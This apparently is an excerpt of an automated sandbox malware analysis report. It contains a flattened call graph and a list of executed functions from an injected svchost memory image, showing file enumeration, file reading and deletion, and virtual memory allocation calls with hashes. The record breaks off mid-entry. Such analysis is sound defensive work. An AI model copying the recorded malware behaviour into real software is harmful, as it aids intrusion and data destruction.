2c2b150 LdrLoadDll 34026->34027 34029 2c353d7 34027->34029 34028 2c353e0 34028->33874 34029->34028 34030 2c37830 LdrLoadDll 34029->34030 34031 2c353fd 34030->34031 34032 2c37830 LdrLoadDll 34031->34032 34033 2c35418 34032->34033 34034 2c37830 LdrLoadDll 34033->34034 34035 2c35431 34034->34035 34036 2c37830 LdrLoadDll 34035->34036 34037 2c3544d 34036->34037 34038 2c37830 LdrLoadDll 34037->34038 34039 2c35466 34038->34039 34040 2c37830 LdrLoadDll 34039->34040 34041 2c3547f 34040->34041 34042 2c2b150 LdrLoadDll 34041->34042 34044 2c354ab 34042->34044 34043 2c35559 34043->33874 34044->34043 34045 2c37830 LdrLoadDll 34044->34045 34046 2c354cf 34045->34046 34047 2c2b150 LdrLoadDll 34046->34047 34048 2c35504 34047->34048 34048->34043 34049 2c37830 LdrLoadDll 34048->34049 34050 2c35527 34049->34050 34051 2c37830 LdrLoadDll 34050->34051 34052 2c35540 34051->34052 34053 2c37830 LdrLoadDll 34052->34053 34053->34043 34055 2c352f5 34054->34055 34055->33882 34057 2c3d4a0 LdrLoadDll 34056->34057 34058 2c3c68c 34057->34058 34062 3269610 LdrInitializeThunk 34058->34062 34059 2c3c6ab 34059->33890 34061->33890 34062->34059 34064 2c31898 34063->34064 34065 2c2b4a0 LdrLoadDll 34064->34065 34066 2c31936 34065->34066 34067 2c2b4a0 LdrLoadDll 34066->34067 34068 2c31951 34067->34068 34069 2c2cdd0 2 API calls 34068->34069 34070 2c31976 34069->34070 34071 2c31abd 34070->34071 34115 2c3c5f0 34070->34115 34073 2c31ace 34071->34073 34103 2c311c0 34071->34103 34073->33898 34076 2c31ab3 34077 2c3c960 2 API calls 34076->34077 34077->34071 34078 2c319af 34079 2c3c960 2 API calls 34078->34079 34080 2c319e9 34079->34080 34120 2c3e590 LdrLoadDll 34080->34120 34082 2c31a1f 34082->34073 34083 2c2cdd0 2 API calls 34082->34083 34084 2c31a45 34083->34084 34084->34073 34085 2c3c5f0 2 API calls 34084->34085 34086 2c31a6a 34085->34086 34087 2c31a71 34086->34087 34088 2c31a9d 34086->34088 34090 2c3c960 2 API calls 34087->34090 34089 2c3c960 2 API calls 34088->34089 34091 2c31aa7 34089->34091 34092 2c31a7b 34090->34092 34091->33898 34092->33898 34093->33903 34094->33899 34095->33904 34096->33900 34097->33908 34098->33914 34099->33911 34100->33918 34101->33913 34102->33916 34104 2c311e5 34103->34104 34105 2c2b4a0 LdrLoadDll 34104->34105 34106 2c312a0 34105->34106 34107 2c2b4a0 LdrLoadDll 34106->34107 34108 2c312c4 34107->34108 34109 2c37420 10 API calls 34108->34109 34111 2c31317 34109->34111 34110 2c313d1 34110->34073 34111->34110 34112 2c2b4a0 LdrLoadDll 34111->34112 34113 2c3137e 34112->34113 34114 2c37420 10 API calls 34113->34114 34114->34110 34116 2c3d4a0 LdrLoadDll 34115->34116 34117 2c3c60c 34116->34117 34121 3269650 LdrInitializeThunk 34117->34121 34118 2c319a4 34118->34076 34118->34078 34120->34082 34121->34118 34123 2c2e7ef 34122->34123 34124 2c37830 LdrLoadDll 34122->34124 34125 2c2e7f6 GetFileAttributesW 34123->34125 34126 2c2e801 34123->34126 34124->34123 34125->34126 34126->33930 34130 2c34336 34127->34130 34151 2c3acc0 34127->34151 34129 2c3438b 34129->33930 34130->34129 34131 2c34397 34130->34131 34132 2c34355 34130->34132 34133 2c2b4a0 LdrLoadDll 34131->34133 34134 2c3437a 34132->34134 34135 2c3435d 34132->34135 34136 2c343a8 34133->34136 34138 2c3e3d0 2 API calls 34134->34138 34137 2c3e3d0 2 API calls 34135->34137 34140 2c37420 10 API calls 34136->34140 34139 2c3436e 34137->34139 34138->34129 34139->33930 34141 2c343bf 34140->34141 34191 2c33770 34141->34191 34143 2c343ca 34147 2c344c8 34143->34147 34148 2c343e2 34143->34148 34144 2c344af 34145 2c3e3d0 2 API calls 34144->34145 34146 2c345d3 34145->34146 34146->33930 34147->34144 34202 2c33d00 11 API calls 34147->34202 34148->34144 34201 2c33d00 11 API calls 34148->34201 34152 2c3acce 34151->34152 34153 2c3acd5 34151->34153 34152->34130 34154 2c2b150 LdrLoadDll 34153->34154 34155 2c3ad07 34154->34155 34156 2c3ad16 34155->34156 34203 2c3a7b0 LdrLoadDll 34155->34203 34157 2c3e4b0 2 API calls 34156->34157 34160 2c3aef9 34156->34160 34159 2c3ad2f 34157->34159 34159->34160 34161 2c3ad44 34159->34161 34162 2c3aea8 34159->34162 34160->34130 34204 2c33850 LdrLoadDll 34161->34204 34163 2c3aeb2 34162->34163 34164 2c3af4b 34162->34164 34205 2c33850 LdrLoadDll 34163->34205 34167 2c3e3d0 2 API calls 34164->34167 34167->34160 34168 2c3ad5b 34172 2c37830 LdrLoadDll 34168->34172 34169 2c3aec9 34206 2c3a0e0 LdrLoadDll 34169->34206 34171 2c3aedf 34174 2c37830 LdrLoadDll 34171->34174 34173 2c3ad77 34172->34173 34175 2c37830 LdrLoadDll 34173->34175 34174->34160 34176 2c3ad93 34175->34176 34177 2c37830 LdrLoadDll 34176->34177 34178 2c3adb2 34177->34178 34179 2c37830 LdrLoadDll 34178->34179 34180 2c3adce 34179->34180 34181 2c37830 LdrLoadDll 34180->34181 34182 2c3adea 34181->34182 34183 2c37830 LdrLoadDll 34182->34183 34184 2c3ae09 34183->34184 34185 2c37830 LdrLoadDll 34184->34185 34186 2c3ae25 34185->34186 34187 2c37830 LdrLoadDll 34186->34187 34188 2c3ae48 34187->34188 34188->34160 34189 2c3e3d0 2 API calls 34188->34189 34190 2c3ae9c 34189->34190 34190->34130 34192 2c37420 10 API calls 34191->34192 34193 2c33786 34192->34193 34194 2c33793 34193->34194 34195 2c37420 10 API calls 34193->34195 34194->34143 34196 2c337a4 34195->34196 34196->34194 34197 2c37420 10 API calls 34196->34197 34198 2c337bf 34197->34198 34199 2c3e3d0 2 API calls 34198->34199 34200 2c337cc 34199->34200 34200->34143 34201->34148 34202->34147 34203->34156 34204->34168 34205->34169 34206->34171 34208 2c33219 34207->34208 34209 2c37830 LdrLoadDll 34208->34209 34210 2c33256 34209->34210 34211 2c37830 LdrLoadDll 34210->34211 34212 2c33274 34211->34212 34213 2c37830 LdrLoadDll 34212->34213 34215 2c33296 34213->34215 34214 2c3331c 34214->33946 34215->34214 34216 2c332c0 FindFirstFileW 34215->34216 34216->34214 34220 2c332db 34216->34220 34217 2c33303 FindNextFileW 34219 2c33315 FindClose 34217->34219 34217->34220 34219->34214 34220->34217 34221 2c330d0 13 API calls 34220->34221 34221->34220 34222->33989 34224 2c3ab76 34223->34224 34226 2c3ac76 34223->34226 34225 2c37420 10 API calls 34224->34225 34224->34226 34225->34224 34226->34002 34227->34002 34228->34002 34230 2c30d25 34229->34230 34231 2c2b4a0 LdrLoadDll 34230->34231 34232 2c30d8a 34231->34232 34233 2c2b4a0 LdrLoadDll 34232->34233 34234 2c30dd8 34233->34234 34235 2c2e7d0 2 API calls 34234->34235 34236 2c30e1f 34235->34236 34237 2c30e26 34236->34237 34238 2c3acc0 3 API calls 34236->34238 34237->34008 34240 2c30e34 34238->34240 34239 2c30e3d 34239->34008 34240->34239 34241 2c2b4a0 LdrLoadDll 34240->34241 34243 2c30e8c 34241->34243 34242 2c3ab60 10 API calls 34242->34243 34243->34242 34245 2c30f11 34243->34245 34263 2c30440 34243->34263 34246 2c30f69 34245->34246 34274 2c307a0 34245->34274 34248 2c3e3d0 2 API calls 34246->34248 34249 2c30f70 34248->34249 34249->34008 34251 2c309f6 34250->34251 34261 2c30a01 34250->34261 34252 2c3e4b0 2 API calls 34251->34252 34252->34261 34253 2c30a17 34253->34010 34254 2c2e7d0 2 API calls 34254->34261 34255 2c30cd0 34256 2c30ce9 34255->34256 34257 2c3e3d0 2 API calls 34255->34257 34256->34010 34257->34256 34258 2c3ab60 10 API calls 34258->34261 34259 2c2b4a0 LdrLoadDll 34259->34261 34260 2c30440 11 API calls 34260->34261 34261->34253 34261->34254 34261->34255 34261->34258 34261->34259 34261->34260 34262 2c307a0 10 API calls 34261->34262 34262->34261 34264 2c30466 34263->34264 34265 2c37420 10 API calls 34264->34265 34266 2c304c2 34265->34266 34267 2c33770 10 API calls 34266->34267 34268 2c304cd 34267->34268 34270 2c30650 34268->34270 34272 2c304eb 34268->34272 34269 2c30635 34269->34243 34270->34269 34271 2c30310 11 API calls 34270->34271 34271->34270 34272->34269 34280 2c30310 34272->34280 34275 2c307c6 34274->34275 34276 2c37420 10 API calls 34275->34276 34277 2c30837 34276->34277 34278 2c33770 10 API calls 34277->34278 34279 2c30842 34278->34279 34279->34245 34281 2c30326 34280->34281 34284 2c33be0 34281->34284 34283 2c3042e 34283->34272 34285 2c33c1d 34284->34285 34286 2c33ccd 34285->34286 34287 2c34bc0 11 API calls 34285->34287 34288 2c33c70 34285->34288 34286->34283 34287->34288 34289 2c33ca9 34288->34289 34290 2c3e3d0 LdrLoadDll RtlFreeHeap 34288->34290 34289->34283 34290->34289 34291->33810 34292->33822 34293->33820 34294->33813 34295 2c2ec0d 34296 2c37420 10 API calls 34295->34296 34297 2c2ebcf 34296->34297

                                                                Executed Functions

                                                                Function 02C331E9 Relevance: 4.6, APIs: 3, Instructions: 108fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C332D1
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02C3330E
                                                                • FindClose.KERNELBASE(?), ref: 02C33319
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: e087d6266e537de7c3881d886d1f84b5cc3f088032b63820a1d25fb8ebf71d50
                                                                • Instruction ID: 5155279eb01dd50db1b21766e112be1ef3a36aae635218ab26028b03e7568681
                                                                • Opcode Fuzzy Hash: e087d6266e537de7c3881d886d1f84b5cc3f088032b63820a1d25fb8ebf71d50
                                                                • Instruction Fuzzy Hash: 9C3184B59002896BEB21DFA4CC81FEE77799F84704F144898E948A7180DB70AA85DBE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C331F0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C332D1
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02C3330E
                                                                • FindClose.KERNELBASE(?), ref: 02C33319
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 1deacab0ff5942a3dcf8cae9cc29e520d99c03fce7513b58c6128043ddb8d2ba
                                                                • Instruction ID: 398aacd27d71dffd6898a1d993d6f37ad933026b9fbea3eb4a47770d2ef9ee22
                                                                • Opcode Fuzzy Hash: 1deacab0ff5942a3dcf8cae9cc29e520d99c03fce7513b58c6128043ddb8d2ba
                                                                • Instruction Fuzzy Hash: FD3165B59002487BEB21EBA4CC85FEF777DDF84704F144998F948A7180DB70AA859BE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3C95B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(02C2E555,00000000,?,02C2E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02C3C985
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID: <sxU
                                                                • API String ID: 3535843008-837359753
                                                                • Opcode ID: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                • Instruction ID: a5f71027cf294b23632f4caaccaae1b725ac381e7b253be1d8b3fb3135129d76
                                                                • Opcode Fuzzy Hash: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                • Instruction Fuzzy Hash: A0E012762002146BD614EB98DC45ED77B69DF48760F418495BA1DAB741C131EA1187E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CA0A Relevance: 1.5, APIs: 1, Instructions: 47memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,02C217C4,00000004,00001000,00000000), ref: 02C3CA49
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                • Instruction ID: 01dd5fd4256fad62b09d66b69cffd7dc5be9bd0bb4fc1d3dfb4087655761f7c8
                                                                • Opcode Fuzzy Hash: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                • Instruction Fuzzy Hash: 9D011276200219ABCB18DF98DC45DEB77ADEF8C354F108559FA4D9B245C631F911CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3C8DA Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(02C37750,02C32C20,FFFFFFFF,02C37233,00000002,?,02C37750,00000002,02C37233,FFFFFFFF,02C32C20,02C37750,00000002,00000000), ref: 02C3C925
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                • Instruction ID: e5f258e5939b39a7fe65c21aafe7d714d3b5fdd23fe9f4399abf7e0783f61373
                                                                • Opcode Fuzzy Hash: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                • Instruction Fuzzy Hash: 91F0E7B2200208ABCB14DF99DC84EDB77AEEF8C724F118648BA0D97245C631E811CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3C830 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00000000,?,02C3758C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C3758C,?,00000000,00000060,00000000,00000000), ref: 02C3C87D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                • Instruction ID: 11f03e3fa52cee2990c5778b2c743ee96b72d97a5d591a8b3b00b9454b836a1e
                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                • Instruction Fuzzy Hash: CBF074B2215208AFCB48DF89DC85EEB77EDAF8C754F158248BA0D97245D630F851CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3C8E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(02C37750,02C32C20,FFFFFFFF,02C37233,00000002,?,02C37750,00000002,02C37233,FFFFFFFF,02C32C20,02C37750,00000002,00000000), ref: 02C3C925
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                • Instruction ID: b78fe504f531d4c0caa85425f6d180a870c91caa42efb79828ba21f7f7553d43
                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                • Instruction Fuzzy Hash: F6F0A4B2210208ABCB14DF99DC84EEB77ADAF8C754F118648BA0DA7245D630E8118BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CA10 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,02C217C4,00000004,00001000,00000000), ref: 02C3CA49
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                • Instruction ID: 219921f6f8d6a6f40f9fa463be773db1ff05e88b183cf4de61dff683a1c3b3e6
                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                • Instruction Fuzzy Hash: DEF015B2210208ABCB18DF89DC80EAB77ADAF88764F018148BE0997241C630F810CBB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3C960 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(02C2E555,00000000,?,02C2E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02C3C985
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                • Instruction ID: e6ada71cd8f60524cda69f7d687eb1a79c47546cb6ffc0f454986ed2c423ad66
                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                • Instruction Fuzzy Hash: 5DD01772200214ABD614EBA8DC89E977BADDF88660F018495BA1D6B242C530FA108AE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3C930 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtDeleteFile.NTDLL(02C37552,00000002,?,02C37552,00000000,00000018,?,?,622BA63F,00000000,?), ref: 02C3C955
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                • Instruction ID: 337de4666998a57923705f05e24fbd558f6e490d69d1b164c3af7cd052f60197
                                                                • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                • Instruction Fuzzy Hash: F2D017722402146BD614EB98DC89ED77BACDF88760F018895BA1D6B241C630FA108BE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ff899c67af30133906462e94e32b5d880a0068ed0d884a6f90cc2a5cce406c8a
                                                                • Instruction ID: 6b0cac2aa7e67a443dab2c48a24a226d65b640801de6ed53355308306db7d374
                                                                • Opcode Fuzzy Hash: ff899c67af30133906462e94e32b5d880a0068ed0d884a6f90cc2a5cce406c8a
                                                                • Instruction Fuzzy Hash: E690026122184442E200A5794C14B070005ABD0343F51C119A0145554CCA6588A16561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fb1cfbc8bfc4f68e387188cc25401e3f6983783a69458d26796f82f1859d8c10
                                                                • Instruction ID: 078e858d57e2e03d0270ff82ba0aad9a61a3106b618d65792fa73394785b27cf
                                                                • Opcode Fuzzy Hash: fb1cfbc8bfc4f68e387188cc25401e3f6983783a69458d26796f82f1859d8c10
                                                                • Instruction Fuzzy Hash: CB9002B121104802E140B16944047460005ABD0341F51C015A5055554E87A98DD576A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 032699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 87e6b7b395fa60b84fd7eb3758437274df6f7b600e564ca9910b0798b797e4af
                                                                • Instruction ID: 33ab2d0d685d626d62c7d2e6d3bff6d15204d31fe5b3dfb1c80763489dd68f69
                                                                • Opcode Fuzzy Hash: 87e6b7b395fa60b84fd7eb3758437274df6f7b600e564ca9910b0798b797e4af
                                                                • Instruction Fuzzy Hash: 089002A135104842E100A1694414B060005EBE1341F51C019E1055554D8769CC927166
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d4b42efa818ebdd2ca9c5cc007b1d8ee559e97133f337a7c4d224b2907c25511
                                                                • Instruction ID: db75e0d8e5bbd73747c4bf9600d676c66f504b6bb073de8f216608ce1aa01c46
                                                                • Opcode Fuzzy Hash: d4b42efa818ebdd2ca9c5cc007b1d8ee559e97133f337a7c4d224b2907c25511
                                                                • Instruction Fuzzy Hash: D690027121104813E111A16945047070009ABD0281F91C416A0415558D97A68992B161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9d251d6cce5fae5cb94ad296935856c501f45cb0f698a5011c8a4e9ed81d85cc
                                                                • Instruction ID: f037894a4908778d39da71a3910caef46d45165448280060c60399fb9bfdb77b
                                                                • Opcode Fuzzy Hash: 9d251d6cce5fae5cb94ad296935856c501f45cb0f698a5011c8a4e9ed81d85cc
                                                                • Instruction Fuzzy Hash: B8900261252085526545F16944045074006BBE0281791C016A1405950C86769896E661
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 31dba4411e219928403b343979b15bba4e776dbfe14b9df739d78928837dc289
                                                                • Instruction ID: 8bfc06e7c11cb1ab5bbb3a6ae525682a64e0c9bcb6c5bcb989b857dca34b7352
                                                                • Opcode Fuzzy Hash: 31dba4411e219928403b343979b15bba4e776dbfe14b9df739d78928837dc289
                                                                • Instruction Fuzzy Hash: 0290027121104802E100A5A954086460005ABE0341F51D015A5015555EC7B588D17171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
